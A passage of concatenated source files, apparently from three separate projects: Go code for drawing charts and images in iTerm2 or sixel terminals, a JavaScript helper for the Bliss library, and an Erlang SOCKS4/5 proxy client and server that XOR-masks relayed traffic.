TickStyle: chart.Style{
StrokeColor: chart.ColorTransparent,
},
TickPosition: 10, // hide text with non-existing position
GridMajorStyle: chart.Style{
Hidden: false,
StrokeColor: chart.ColorAlternateGray.WithAlpha(100),
StrokeWidth: 2.0,
StrokeDashArray: []float64{2.0, 2.0},
},
GridLines: markers,
}
}
graph.Elements = []chart.Renderable{
legend(&graph, chart.Style{
FillColor: drawing.Color{A: 100},
FontColor: chart.ColorWhite,
StrokeColor: chart.ColorTransparent,
}),
}
return graph
}
func minMax(values []float64, curMin, curMax float64) (min, max float64) {
min, max = curMin, curMax
for _, value := range values {
if value < min {
min = value
}
if value > max {
max = value
}
}
return
}
func siValueFormater(v interface{}) string {
value, prefix := humanize.ComputeSI(v.(float64))
value = float64(int(value*100)) / 100
return humanize.Ftoa(value) + " " + prefix
}
func textColor(bg drawing.Color) drawing.Color {
var L float64
for c, f := range map[uint8]float64{bg.R: 0.2126, bg.G: 0.7152, bg.B: 0.0722} {
c := float64(c) / 255.0
if c <= 0.03928 {
c = c / 12.92
} else {
c = math.Pow(((c + 0.055) / 1.055), 2.4)
}
L += c * f
}
if L > 0.179 {
return chart.ColorBlack
}
return chart.ColorWhite
}
<|start_filename|>term/common.go<|end_filename|>
package term
import (
"errors"
"fmt"
"io"
"os"
"sync"
"time"
"golang.org/x/crypto/ssh/terminal"
)
var ecsi = "\033]"
var st = "\007"
var cellSizeOnce sync.Once
var cellWidth, cellHeight float64
var termWidth, termHeight int
func HasGraphicsSupport() bool {
return os.Getenv("TERM_PROGRAM") == "iTerm.app" || sixelEnabled
}
// ClearScrollback clears iTerm2 scrollback.
func ClearScrollback() {
if !sixelEnabled {
print(ecsi + "1337;ClearScrollback" + st)
}
}
// TermSize contains sizing information of the terminal.
type TermSize struct {
Row int
Col int
Width int
Height int
}
func initCellSize() {
s, err := terminal.MakeRaw(1)
if err != nil {
return
}
defer terminal.Restore(1, s)
if sixelEnabled {
fmt.Fprint(os.Stdout, "\033[14t")
fileSetReadDeadline(os.Stdout, time.Now().Add(time.Second))
defer fileSetReadDeadline(os.Stdout, time.Time{})
fmt.Fscanf(os.Stdout, "\033[4;%d;%dt", &termHeight, &termWidth)
return
}
fmt.Fprint(os.Stdout, ecsi+"1337;ReportCellSize"+st)
fileSetReadDeadline(os.Stdout, time.Now().Add(time.Second))
defer fileSetReadDeadline(os.Stdout, time.Time{})
fmt.Fscanf(os.Stdout, "\033]1337;ReportCellSize=%f;%f\033\\", &cellHeight, &cellWidth)
}
// Size gathers sizing information of the current session's controling terminal.
func Size() (size TermSize, err error) {
size.Col, size.Row, err = terminal.GetSize(1)
if err != nil {
return
}
cellSizeOnce.Do(initCellSize)
if termWidth > 0 && termHeight > 0 {
size.Width = int(termWidth/(size.Col-1)) * (size.Col - 1)
size.Height = int(termHeight/(size.Row-1)) * (size.Row - 1)
return
}
if cellWidth+cellHeight == 0 {
err = errors.New("cannot get terminal cell size")
}
size.Width, size.Height = size.Col*int(cellWidth), size.Row*int(cellHeight)
return
}
// Rows returns the number of rows for the controling terminal.
func Rows() (rows int, err error) {
_, rows, err = terminal.GetSize(1)
return
}
func NewImageWriter(width, height int) io.WriteCloser {
if sixelEnabled {
return &sixelWriter{
Width: width,
Height: height,
}
}
return &imageWriter{
Width: width,
Height: height,
}
}
<|start_filename|>term/sixel.go<|end_filename|>
package term
import (
"bytes"
"image/png"
"os"
"sync"
"time"
"github.com/mattn/go-isatty"
"github.com/mattn/go-sixel"
"golang.org/x/crypto/ssh/terminal"
)
var sixelEnabled = false
func init() {
if os.Getenv("TERM_PROGRAM") != "iTerm.app" {
sixelEnabled = checkSixel()
}
}
func checkSixel() bool {
if isatty.IsCygwinTerminal(os.Stdout.Fd()) {
return true
}
s, err := terminal.MakeRaw(1)
if err != nil {
return false
}
defer terminal.Restore(1, s)
_, err = os.Stdout.Write([]byte("\x1b[c"))
if err != nil {
return false
}
defer fileSetReadDeadline(os.Stdout, time.Time{})
var b [100]byte
n, err := os.Stdout.Read(b[:])
if err != nil {
return false
}
var supportedTerminals = []string{
"\x1b[?62;", // VT240
"\x1b[?63;", // wsltty
"\x1b[?64;", // mintty
"\x1b[?65;", // RLogin
}
supported := false
for _, supportedTerminal := range supportedTerminals {
if bytes.HasPrefix(b[:n], []byte(supportedTerminal)) {
supported = true
break
}
}
if !supported {
return false
}
for _, t := range bytes.Split(b[6:n], []byte(";")) {
if len(t) == 1 && t[0] == '4' {
return true
}
}
return false
}
type sixelWriter struct {
Name string
Width int
Height int
once sync.Once
enc *sixel.Encoder
buf *bytes.Buffer
}
func (w *sixelWriter) init() {
w.buf = &bytes.Buffer{}
w.enc = sixel.NewEncoder(os.Stdout)
}
// Write writes the PNG image data into the imageWriter buffer.
func (w *sixelWriter) Write(p []byte) (n int, err error) {
w.once.Do(w.init)
return w.buf.Write(p)
}
// Close flushes the image to the terminal and close the writer.
func (w *sixelWriter) Close() error {
w.once.Do(w.init)
img, err := png.Decode(w.buf)
if err != nil {
return err
}
return w.enc.Encode(img)
}
<|start_filename|>term/iterm2.go<|end_filename|>
package term
import (
"bytes"
"encoding/base64"
"fmt"
"io"
"os"
"sync"
)
func init() {
if os.Getenv("TERM") == "screen" {
ecsi = "\033Ptmux;\033" + ecsi
st += "\033\\"
}
}
// imageWriter is a writer that write into iTerm2 terminal the PNG data written
type imageWriter struct {
Name string
Width int
Height int
once sync.Once
b64enc io.WriteCloser
buf *bytes.Buffer
}
func (w *imageWriter) init() {
w.buf = &bytes.Buffer{}
w.b64enc = base64.NewEncoder(base64.StdEncoding, w.buf)
}
// Write writes the PNG image data into the imageWriter buffer.
func (w *imageWriter) Write(p []byte) (n int, err error) {
w.once.Do(w.init)
return w.b64enc.Write(p)
}
// Close flushes the image to the terminal and close the writer.
func (w *imageWriter) Close() error {
w.once.Do(w.init)
fmt.Printf("%s1337;File=preserveAspectRatio=1;width=%dpx;height=%dpx;inline=1:%s%s", ecsi, w.Width, w.Height, w.buf.Bytes(), st)
return w.b64enc.Close()
}
| Rutori/jplot |
<|start_filename|>bliss._.js<|end_filename|>
(function($) {
"use strict";
if (!Bliss || Bliss.shy) {
return;
}
var _ = Bliss.property;
// Methods requiring Bliss Full
$.add({
// Clone elements, with events and data
clone: function () {
console.warn("$.clone() is deprecated and will be removed in a future version of Bliss.");
var clone = this.cloneNode(true);
var descendants = $.$("*", clone).concat(clone);
$.$("*", this).concat(this).forEach(function(element, i, arr) {
$.events(descendants[i], element);
descendants[i]._.data = $.extend({}, element._.data);
});
return clone;
}
}, {array: false});
// Define the _ property on arrays and elements
Object.defineProperty(Node.prototype, _, {
// Written for IE compatibility (see #49)
get: function getter () {
Object.defineProperty(Node.prototype, _, {
get: undefined
});
Object.defineProperty(this, _, {
value: new $.Element(this)
});
Object.defineProperty(Node.prototype, _, {
get: getter
});
return this[_];
},
configurable: true
});
Object.defineProperty(Array.prototype, _, {
get: function () {
Object.defineProperty(this, _, {
value: new $.Array(this)
});
return this[_];
},
configurable: true
});
// Hijack addEventListener and removeEventListener to store callbacks
if (self.EventTarget && "addEventListener" in EventTarget.prototype) {
EventTarget.prototype.addEventListener = function(type, callback, options) {
return $.bind(this, type, callback, options);
};
EventTarget.prototype.removeEventListener = function(type, callback, options) {
return $.unbind(this, type, callback, options);
};
}
// Set $ and $$ convenience methods, if not taken
self.$ = self.$ || $;
self.$$ = self.$$ || $.$;
})(Bliss);
| LeaVerou/bliss |
<|start_filename|>apps/proxy_server/src/proxy_server_sup.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 8 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_server_sup).
-behaviour(supervisor_bridge).
%% API
-export([start_link/0]).
%% supervisor_bridge callbacks
-export([init/1, terminate/2]).
-define(SERVER, ?MODULE).
-record(state, {}).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the supervisor bridge
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
start_link() ->
supervisor_bridge:start_link({local, ?SERVER}, ?MODULE, []).
%%%===================================================================
%%% supervisor_bridge callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Creates a supervisor_bridge process, linked to the calling process,
%% which calls Module:init/1 to start the subsystem. To ensure a
%% synchronized start-up procedure, this function does not return
%% until Module:init/1 has returned.
%%
%% @spec init(Args) -> {ok, Pid, State} |
%% ignore |
%% {error, Reason}
%% @end
%%--------------------------------------------------------------------
init([]) ->
Pid = spawn(proxy_server, start, []),
{ok, Pid, #state{}}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by the supervisor_bridge when it is about
%% to terminate. It should be the opposite of Module:init/1 and stop
%% the subsystem and do any necessary cleaning up.The return value is
%% ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(Reason, _State) ->
proxy_gate ! {stop, self(), Reason},
receive
{ack, stop} ->
ok
after 2000 ->
ok
end.
%%%===================================================================
%%% Internal functions
%%%===================================================================
<|start_filename|>apps/proxy_client/src/proxy_defs.hrl<|end_filename|>
-define(IPV4, 16#01).
-define(IPV6, 16#04).
-define(DOMAIN, 16#03).
-define(OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
-define(OPTIONS(IP), [{ip, IP} | ?OPTIONS]).
-define(GETADDR, fun(IP) -> {ok, Addr} = inet:getaddr(IP, inet), Addr end).
-ifdef(DEBUG).
-define(LOG(Msg, Args), io:format(Msg, Args)).
-define(LOG(Msg), io:format(Msg)).
-else.
-define(LOG(Msg, Args), true).
-define(LOG(Msg), true).
-endif.
<|start_filename|>apps/proxy_server/src/proxy_transform.erl<|end_filename|>
-module(proxy_transform).
-export([transform/1]).
-define(SIGN, 2#01111001).
%% this module used for mess the data which will transfer on internet.
transform(Data) ->
transform(Data, ?SIGN, []).
transform(<<>>, _, Res) ->
list_to_binary( lists:reverse(Res) );
transform(<<H:8, T/binary>>, Sign, Res) ->
transform(T, Sign, [H bxor Sign | Res]).
<|start_filename|>apps/proxy_client/src/proxy_client_worker.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 8 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_client_worker).
-behaviour(gen_server).
%% API
-export([start_link/1]).
%% gen_server callbacks
-export([init/1, handle_call/3, handle_cast/2, handle_info/2,
terminate/2, code_change/3]).
-define(SERVER, ?MODULE).
-record(state, {server_ip,
server_port,
server_sock,
client_ip,
client_port,
client_sock
}).
-define(SOCK_OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
-include("proxy_defs.hrl").
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the server
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
% Leave name {local, name} so that the process
% remains unregistered. This enables us to start
% mutliple processes using the pr_sup:start_child() call
start_link(ClientSock) ->
ConfFile = filename:join(code:priv_dir(proxy_client), "client.conf"),
case file:consult(ConfFile) of
{ok, Conf} ->
gen_server:start_link(?MODULE, [{client_sock, ClientSock}|Conf], []);
{error, _Reason} ->
{error, conf_file_error}
end.
%%%===================================================================
%%% gen_server callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Initializes the server
%%
%% @spec init(Args) -> {ok, State} |
%% {ok, State, Timeout} |
%% ignore |
%% {stop, Reason}
%% @end
%%--------------------------------------------------------------------
init(Conf) ->
ServerIP = proplists:get_value(server_ip, Conf),
ServerPort = proplists:get_value(server_port, Conf),
ClientIP = proplists:get_value(listen_ip, Conf),
ClientPort = proplists:get_value(listen_port, Conf),
Client = proplists:get_value(client_sock, Conf),
case gen_tcp:connect(getaddr_or_fail(ServerIP), ServerPort, ?SOCK_OPTIONS) of
{ok, RemoteSocket} ->
ok = inet:setopts(RemoteSocket, [{active, true}]),
{ok, #state{server_ip=ServerIP,
server_port=ServerPort,
server_sock=RemoteSocket,
client_ip=ClientIP,
client_port=ClientPort,
client_sock=Client}, 0};
%%communicate(Client, RemoteSocket);
{error, Error} ->
?LOG("Connect error, ~p. ~p:~p~n", [Error, ServerIP, ServerPort]),
gen_tcp:close(Client),
{stop, server_connect_fail}
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling call messages
%%
%% @spec handle_call(Request, From, State) ->
%% {reply, Reply, State} |
%% {reply, Reply, State, Timeout} |
%% {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, Reply, State} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_call(_Request, _From, State) ->
Reply = ok,
{reply, Reply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling cast messages
%%
%% @spec handle_cast(Msg, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_cast(_Msg, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling all non call/cast messages
%%
%% @spec handle_info(Info, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_info(timeout, #state{server_sock=RemoteSocket, client_sock=Client, client_ip=LocalIP, client_port=LocalPort} = State) ->
% try
case find_target(Client) of
{ok, Mod, {connect, Addr}} ->
Target = encode_addr(Addr),
ok = gen_tcp:send(RemoteSocket, proxy_transform:transform(Target)),
ok = inet:setopts(Client, [{active, true}]),
IP = list_to_binary(tuple_to_list(getaddr_or_fail(LocalIP))),
ok = gen_tcp:send(Client, Mod:unparse_connection_response({granted, {ipv4, IP, LocalPort}})),
{noreply, State};
{error, client_closed} ->
{stop, normal, State};
{error, Reason} ->
?LOG("client communication init error: ~p~n", [Reason]),
{stop, Reason, State}
%% end
%% catch
%% error:{badmatch,_} ->
%% {stop, normal, State};
%% _Error:_Reason ->
%% ?LOG("client recv error, ~p: ~p~n", [_Error, _Reason]),
%% {stop, normal, State}
end;
handle_info({tcp, Client, Request}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case gen_tcp:send(RemoteSocket, proxy_transform:transform(Request)) of
ok ->
{noreply, State};
{error, _Error} ->
{stop, _Error, State}
end;
handle_info({tcp, RemoteSocket, Response}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case gen_tcp:send(Client, proxy_transform:transform(Response)) of
ok ->
{noreply, State};
{error, _Error} ->
{stop, _Error, State}
end;
handle_info({tcp_closed, ASocket}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case ASocket of
Client ->
{stop, normal, State};
RemoteSocket ->
{stop, normal, State}
end;
handle_info({tcp_error, ASocket, _Reason}, #state{server_sock=RemoteSocket, client_sock=Client} = State) ->
case ASocket of
Client ->
?LOG("~p client tcp error~n", [ASocket]),
{stop, _Reason, State};
RemoteSocket ->
?LOG("~p server tcp error~n", [ASocket]),
{stop, _Reason, State}
end;
handle_info(_Info, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by a gen_server when it is about to
%% terminate. It should be the opposite of Module:init/1 and do any
%% necessary cleaning up. When it returns, the gen_server terminates
%% with Reason. The return value is ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(_Reason, #state{server_sock=RemoteSocket, client_sock=Client}) ->
gen_tcp:close(RemoteSocket),
gen_tcp:close(Client),
ok;
terminate(_Reason, _State) ->
ok.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Convert process state when code is changed
%%
%% @spec code_change(OldVsn, State, Extra) -> {ok, NewState}
%% @end
%%--------------------------------------------------------------------
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%===================================================================
%%% Internal functions
%%%===================================================================
getaddr_or_fail(IP) ->
{ok, Addr} = inet:getaddr(IP, inet),
Addr.
find_target(Client) ->
%% 0x05:version
case gen_tcp:recv(Client, 0) of
{ok, <<Version:8, _/binary>> = Greeting} ->
socks_proxy_handshake(Client, Version, Greeting);
{error, closed} ->
{error, client_closed};
{error, Reason} ->
{error, Reason}
end.
socks_proxy_handshake(Client, Version, Greeting) ->
case Version of
%% SOCKS4
16#04 ->
case proxy_proto_socks4:parse_greeting_request(Greeting) of
{connect, _UserId, Addr} ->
{ok, proxy_proto_socks4, {connect, Addr}};
{error, Reason} ->
{error, Reason}
end;
16#05 ->
{auth_methods, _} = proxy_proto_socks5:parse_greeting_request(Greeting),
gen_tcp:send(Client, proxy_proto_socks5:unparse_greeting_response(no_auth)),
{ok, ConnReq} = gen_tcp:recv(Client, 0),
case proxy_proto_socks5:parse_connection_request(ConnReq) of
{connect, Addr} ->
{ok, proxy_proto_socks5, {connect, Addr}};
{error, Reason} ->
{error, Reason}
end
end.
encode_addr({ipv4, Address, Port}) ->
<<?IPV4, Port:16, Address:32>>;
encode_addr({ipv6, Address, Port}) ->
<<?IPV6, Port:16, Address:128>>;
encode_addr({domain, DomainBin, Port}) ->
<<?DOMAIN, Port:16, (byte_size(DomainBin)):8, DomainBin/binary>>;
encode_addr(_) ->
error.
<|start_filename|>apps/proxy_server/src/utils.hrl<|end_filename|>
-define(IPV4, 16#01).
-define(IPV6, 16#04).
-define(DOMAIN, 16#03).
-define(GETADDR, fun(IP) -> {ok, Addr} = inet:getaddr(IP, inet), Addr end).
<|start_filename|>apps/proxy_client/src/proxy_client_srv.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 8 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_client_srv).
-behaviour(gen_server).
%% API
-export([start_link/0]).
%% gen_server callbacks
-export([init/1, handle_call/3, handle_cast/2, handle_info/2,
terminate/2, code_change/3]).
-define(SERVER, ?MODULE).
-define(RETRY_TIMES, 2).
%% sock: client's local socket server
-record(state, {sock}).
-include("proxy_defs.hrl").
-define(SOCK_OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Starts the server
%%
%% @spec start_link() -> {ok, Pid} | ignore | {error, Error}
%% @end
%%--------------------------------------------------------------------
start_link() ->
gen_server:start_link({local, ?SERVER}, ?MODULE, [], []).
%%%===================================================================
%%% gen_server callbacks
%%%===================================================================
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Initializes the server
%%
%% @spec init(Args) -> {ok, State} |
%% {ok, State, Timeout} |
%% ignore |
%% {stop, Reason}
%% @end
%%--------------------------------------------------------------------
init([]) ->
ConfFile = filename:join(code:priv_dir(proxy_client), "client.conf"),
case file:consult(ConfFile) of
{ok, Conf} ->
ListenPort = proplists:get_value(listen_port, Conf),
ListenIP = proplists:get_value(listen_ip, Conf),
{ok, Socket} = gen_tcp:listen(ListenPort, [{ip, ListenIP} | ?SOCK_OPTIONS]),
{ok, #state{sock=Socket}, 0};
{error, _} ->
{stop, conf_file_error}
end.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling call messages
%%
%% @spec handle_call(Request, From, State) ->
%% {reply, Reply, State} |
%% {reply, Reply, State, Timeout} |
%% {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, Reply, State} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_call(_Request, _From, State) ->
Reply = ok,
{reply, Reply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling cast messages
%%
%% @spec handle_cast(Msg, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_cast(_Msg, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Handling all non call/cast messages
%%
%% @spec handle_info(Info, State) -> {noreply, State} |
%% {noreply, State, Timeout} |
%% {stop, Reason, State}
%% @end
%%--------------------------------------------------------------------
handle_info(timeout, #state{sock=Socket}) ->
accept_loop(Socket); % never return
handle_info(_Info, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by a gen_server when it is about to
%% terminate. It should be the opposite of Module:init/1 and do any
%% necessary cleaning up. When it returns, the gen_server terminates
%% with Reason. The return value is ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(_Reason, #state{sock=Socket}) ->
gen_tcp:close(Socket),
ok.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Convert process state when code is changed
%%
%% @spec code_change(OldVsn, State, Extra) -> {ok, NewState}
%% @end
%%--------------------------------------------------------------------
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%===================================================================
%%% Internal functions
%%%===================================================================
accept_loop(Socket) ->
{ok, Client} = gen_tcp:accept(Socket),
%% {ok, Pid} = proxy_client_worker_sup:start_child(Client),
%% case gen_tcp:controlling_process(Client, Pid) of
%% ok ->
%% ok;
%% {error, Reason} ->
%% ?LOG("~p, accept_loop controlling_process error: ~p~n", [Client, Reason])
%% end,
%% here we distingush `try` and `retry`, make try = retry + 1
start_worker_and_hand_over(Client, ?RETRY_TIMES + 1),
accept_loop(Socket).
start_worker_and_hand_over(_Client, 0) ->
?LOG("start_worker_and_hand_over ~p max retry over~n", [_Client]),
{error, max_retry};
start_worker_and_hand_over(Client, Trys) ->
{ok, Pid} = supervisor:start_child(proxy_client_worker_sup, [Client]),
case gen_tcp:controlling_process(Client, Pid) of
ok ->
{ok, Pid};
{error, closed} ->
?LOG("start_worker_and_hand_over ~p client socket closed!~n", [Client]),
supervisor:terminate_child(proxy_client_worker_sup, Pid),
{error, client_closed};
{error, _Reason} ->
supervisor:terminate_child(proxy_client_worker_sup, Pid),
?LOG("start_worker_and_hand_over ~p set controlling_process error: ~p, retry!~n", [Client, _Reason]),
start_worker_and_hand_over(Client, Trys - 1)
end.
<|start_filename|>apps/proxy_client/src/proxy_client.erl<|end_filename|>
-module(proxy_client).
-behaviour(application).
%% Application callbacks
-export([start/2, stop/1]).
-export([start/0]).
%% ===================================================================
%% Application callbacks
%% ===================================================================
start(_StartType, _StartArgs) ->
proxy_client_sup:start_link().
stop(_State) ->
ok.
start() ->
application:start(?MODULE).
<|start_filename|>apps/proxy_server/src/proxy_server.erl<|end_filename|>
-module(proxy_server).
-export([start/0]).
-export([start_process/0,
start_process/1,
accept/1,
start_server/0]).
-include("utils.hrl").
%% WORKER_NUMS - how many process will spawn when server start
%% WORKER_TIMEOUT - an available process will exit after this timeout ,
%% this is used for reduce the spawned work process.
-define(CONNECT_RETRY_TIMES, 2).
-define(WORKER_NUMS, 30).
-define(WORKER_TIMEOUT, 600000).
-define(TIMEOUT, 10000).
-ifdef(DEBUG).
-define(LOG(Msg, Args), io:format(Msg, Args)).
-else.
-define(LOG(Msg, Args), true).
-endif.
-define(SOCK_OPTIONS,
[binary,
{reuseaddr, true},
{active, false},
{nodelay, true}
]).
start() ->
ConfFile = filename:join(code:priv_dir(proxy_server), "server.conf"),
case file:consult(ConfFile) of
{ok, Conf} ->
ListenPort = proplists:get_value(listen_port, Conf),
ListenIP = proplists:get_value(listen_ip, Conf);
{error, _} ->
ListenPort = 8080,
ListenIP = {0,0,0,0}
end,
{ok, Socket} = gen_tcp:listen(ListenPort, [{ip, ListenIP} | ?SOCK_OPTIONS]),
?LOG("Proxy server listen on ~p : ~p~n", [ListenIP, ListenPort]),
register(proxy_gate, self()),
register(server, spawn(?MODULE, start_server, [])),
accept(Socket).
accept(Socket) ->
{ok, Client} = gen_tcp:accept(Socket),
server ! choosepid,
receive
{ok, Pid} ->
ok = gen_tcp:controlling_process(Client, Pid),
Pid ! {connect, Client},
accept(Socket);
{stop, From, _Reason} ->
From ! {ack, stop},
?LOG("Calling stop reason: ~p~n", [_Reason]),
gen_tcp:close(Socket)
after ?TIMEOUT ->
gen_tcp:close(Client),
accept(Socket)
end.
start_server() ->
loop(start_workers(?WORKER_NUMS)).
%% main loop, accept new connections, reuse workers, and purge dead workers.
loop(Workers) ->
NewWorkers =
receive
choosepid ->
manage_workers(choosepid, Workers);
{'DOWN', _Ref, process, Pid, timeout} ->
manage_workers(timeout, Workers, Pid);
{reuse, Pid} ->
manage_workers(reuse, Workers, Pid)
end,
loop(NewWorkers).
%% spawn some works as works pool.
start_workers(Num) ->
start_workers(Num, []).
start_workers(0, Workers) ->
Workers;
start_workers(Num, Workers) ->
{Pid, _Ref} = spawn_monitor(?MODULE, start_process, []),
start_workers(Num-1, [Pid | Workers]).
manage_workers(choosepid, []) ->
[Head | Tail] = start_workers(?WORKER_NUMS),
proxy_gate ! {ok, Head},
Tail;
manage_workers(choosepid, [Head | Tail]) ->
proxy_gate ! {ok, Head},
Tail.
manage_workers(timeout, Works, Pid) ->
?LOG("Clear timeout pid: ~p~n", [Pid]),
lists:delete(Pid, Works);
manage_workers(reuse, Works, Pid) ->
?LOG("Reuse Pid, back to pool: ~p~n", [Pid]),
%% this reused pid MUST put at the tail or works list,
%% for other works can be chosen and use.
Works ++ [Pid].
start_process() ->
receive
{connect, Client} ->
start_process(Client),
server ! {reuse, self()},
start_process()
after ?WORKER_TIMEOUT ->
exit(timeout)
end.
start_process(Client) ->
case gen_tcp:recv(Client, 1) of
{ok, Data} ->
parse_address(Client, proxy_transform:transform(Data));
{error, _Error} ->
?LOG("start recv client error: ~p~n", [_Error]),
gen_tcp:close(Client)
end,
ok.
parse_address(Client, AType) when AType =:= <<?IPV4>> ->
{ok, Data} = gen_tcp:recv(Client, 6),
<<Port:16, Destination/binary>> = proxy_transform:transform(Data),
Address = list_to_tuple( binary_to_list(Destination) ),
communicate(Client, Address, Port);
parse_address(Client, AType) when AType =:= <<?IPV6>> ->
{ok, Data} = gen_tcp:recv(Client, 18),
<<Port:16, Destination/binary>> = proxy_transform:transform(Data),
Address = list_to_tuple( binary_to_list(Destination) ),
communicate(Client, Address, Port);
parse_address(Client, AType) when AType =:= <<?DOMAIN>> ->
{ok, Data} = gen_tcp:recv(Client, 3),
<<Port:16, DomainLen:8>> = proxy_transform:transform(Data),
{ok, DataRest} = gen_tcp:recv(Client, DomainLen),
Destination = proxy_transform:transform(DataRest),
Address = binary_to_list(Destination),
communicate(Client, Address, Port);
parse_address(Client, _AType) ->
%% receive the invalid data. close the connection
?LOG("Invalid data!~n", []),
gen_tcp:close(Client).
communicate(Client, Address, Port) ->
?LOG("Address: ~p, Port: ~p~n", [Address, Port]),
case connect_target(Address, Port, ?CONNECT_RETRY_TIMES) of
{ok, TargetSocket} ->
transfer(Client, TargetSocket);
error ->
?LOG("Connect Address Error: ~p:~p~n", [Address, Port]),
gen_tcp:close(Client)
end.
connect_target(_, _, 0) ->
error;
connect_target(Address, Port, Times) ->
case gen_tcp:connect(Address, Port, ?SOCK_OPTIONS, ?TIMEOUT) of
{ok, TargetSocket} ->
{ok, TargetSocket};
{error, _Error} ->
connect_target(Address, Port, Times-1)
end.
transfer(Client, Remote) ->
inet:setopts(Remote, [{active, once}]),
inet:setopts(Client, [{active, once}]),
receive
{tcp, Client, Request} ->
case gen_tcp:send(Remote, proxy_transform:transform(Request)) of
ok ->
transfer(Client, Remote);
{error, _Error} ->
ok
end;
{tcp, Remote, Response} ->
%% client maybe close the connection when data transferring
case gen_tcp:send(Client, proxy_transform:transform(Response)) of
ok ->
transfer(Client, Remote);
{error, _Error} ->
ok
end;
{tcp_closed, Client} ->
ok;
{tcp_closed, Remote} ->
ok;
{tcp_error, Client, _Reason} ->
ok;
{tcp_error, Remote, _Reason} ->
ok
end,
gen_tcp:close(Remote),
gen_tcp:close(Client),
ok.
<|start_filename|>apps/proxy_client/src/proxy_proto_socks4.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 10 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_proto_socks4).
%% API
-export([]).
-compile([export_all]).
%%%===================================================================
%%% API
%%%===================================================================
parse_greeting_request(<<16#04:8, CmdCode:8, Port:16, Address:32, Rest/binary>>) ->
case CmdCode of
16#01 when Address =< 16#FF ->
[UserId, DomainBin, <<>>] = binary:split(Rest, <<0>>, [global]),
{connect, UserId, {domain, DomainBin, Port}};
16#01 ->
[UserId, <<>>] = binary:split(Rest, <<0>>, [global]),
{connect, UserId, {ipv4, Address, Port}};
16#02 ->
{error, not_implemented_yet}
end.
unparse_greeting_response(granted) ->
<<0:8, 16#5a:8, 16#FFFF:16, 16#FFFFFFFF:32>>;
unparse_greeting_response(rejected) ->
<<0:8, 16#5b:8, 16#FFFF:16, 16#FFFFFFFF:32>>.
unparse_connection_response({granted, _}) ->
unparse_greeting_response(granted);
unparse_connection_response({rejected, _}) ->
unparse_greeting_response(rejected).
%%%===================================================================
%%% Internal functions
%%%===================================================================
<|start_filename|>apps/proxy_client/src/proxy_proto_socks5.erl<|end_filename|>
%%%-------------------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @copyright (C) 2013, <NAME>
%%% @doc
%%%
%%% @end
%%% Created : 10 Apr 2013 by <NAME> <<EMAIL>>
%%%-------------------------------------------------------------------
-module(proxy_proto_socks5).
%% API
-export([]).
-compile([export_all]).
-define(IPV4, 16#01).
